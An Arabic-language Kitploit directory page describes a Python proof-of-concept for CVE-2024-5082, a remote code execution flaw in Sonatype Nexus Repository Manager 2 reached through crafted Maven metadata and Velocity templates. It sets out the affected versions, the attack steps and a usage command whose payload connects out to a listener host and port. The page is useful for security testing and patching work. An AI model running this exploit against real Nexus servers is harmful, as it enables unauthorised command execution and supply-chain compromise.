Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-5082 — إثبات مفهوم لاستغلال CVE-2024-5082، وهي ثغرة تنفيذ كود عن بعد في Sonatype Nexus Repository Manager 2 عبر قطع Maven معدّة ومعالجة قوالب Velocity. | Kitploit
أدوات/GitHubGitHub/h4mr3r/cve-2024-5082
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن سلسلة التوريدتطوير الحمولات
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

إثبات مفهوم لاستغلال CVE-2024-5082، وهي ثغرة تنفيذ كود عن بعد في Sonatype Nexus Repository Manager 2 عبر قطع Maven معدّة ومعالجة قوالب Velocity.

عرض المستودع
12منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظرة عامة

يحتوي هذا المستودع على برهان مفهوم بلغة بايثون لـ CVE-2024-5082، وهي ثغرة تنفيذ أوامر عن بُعد في Sonatype Nexus Repository Manager 2.

تسمح الثغرة لمستخدم لديه صلاحية كافية بنشر قطعة أثرية Maven مصممة خصيصًا ووضع علامة عليها لمعالجتها بواسطة منشئ محتوى Velocity. عند استرداد القطعة الأثرية، يتم تقييم قالب Velocity المضمن بواسطة Nexus وقد ينفذ أمرًا في سياق أمان JVM الخاص بـ Nexus.

وفقًا لـ Sonatype:

  • الإصدارات المتأثرة تشمل Nexus Repository Manager 2.x حتى 2.15.1؛
  • تم إصلاح المشكلة في 2.15.2؛
  • وصل Nexus Repository 2 إلى نهاية العمر الافتراضي في 30 يونيو 2025 ويجب ترحيله إلى Nexus Repository 3.

توضيح مهم للنطاق

يتم تنفيذ الأمر على جهاز استضافة Nexus.

لا يؤدي تنزيل القطعة الأثرية المتأثرة من خادم بناء أو خادم تطبيق أو محطة عمل مطور بحد ذاته إلى تنفيذ الأمر المضمن على ذلك النظام المستهلك. ومع ذلك، قد يؤدي اختراق مدير المستودع إلى خلق مخاطر أوسع في سلسلة التوريد إذا قام المهاجم لاحقًا بتعديل القطع الأثرية الموثوقة أو مدخلات البناء أو بيانات الاعتماد أو تكوين المستودع.

كيف يعمل برهان المفهوم

يقوم السكربت بما يلي:

  1. يولد مسار علامة فريد تحت مساحة اسم على نمط Maven.
  2. يرفع ملف maven-metadata.xml معد خصيصًا إلى مستودع مستضاف محدد.
  3. يقوم بتحديث سمات Nexus المقابلة بحيث يتم تعيين منشئ المحتوى إلى velocity.
  4. يسترد القطعة الأثرية المرفوعة، مما يتسبب في معالجة Nexus للقالب.
  • يحاول إزالة القطعة الأثرية المرفوعة أثناء التنظيف.
  • يقوم الحمولة المقدمة بإنشاء اتصال TCP خارجي من جهاز Nexus إلى عنوان المستمع المكوّن.

    المصادقة والصلاحيات

    يستخدم السكربت الحالي مصادقة HTTP الأساسية ويتطلب:

    • اسم مستخدم وكلمة مرور صالحين لـ Nexus؛
    • صلاحية لإنشاء أو تحديث المحتوى في المستودع المحدد؛
    • صلاحية لتحديث السمة المستخدمة من قبل برهان المفهوم.

    الاستخدام

    root@kitploit:~
    python3 cve_2024_5082.py \\
      --base-url https://nexus.example.test/nexus \\
      --repository security-test-snapshots \\
      --username test-user \\
      --password 'REDACTED' \\
      --lhost LISTENER_IP \\
      --lport 8000
    
    تنزيل الأداة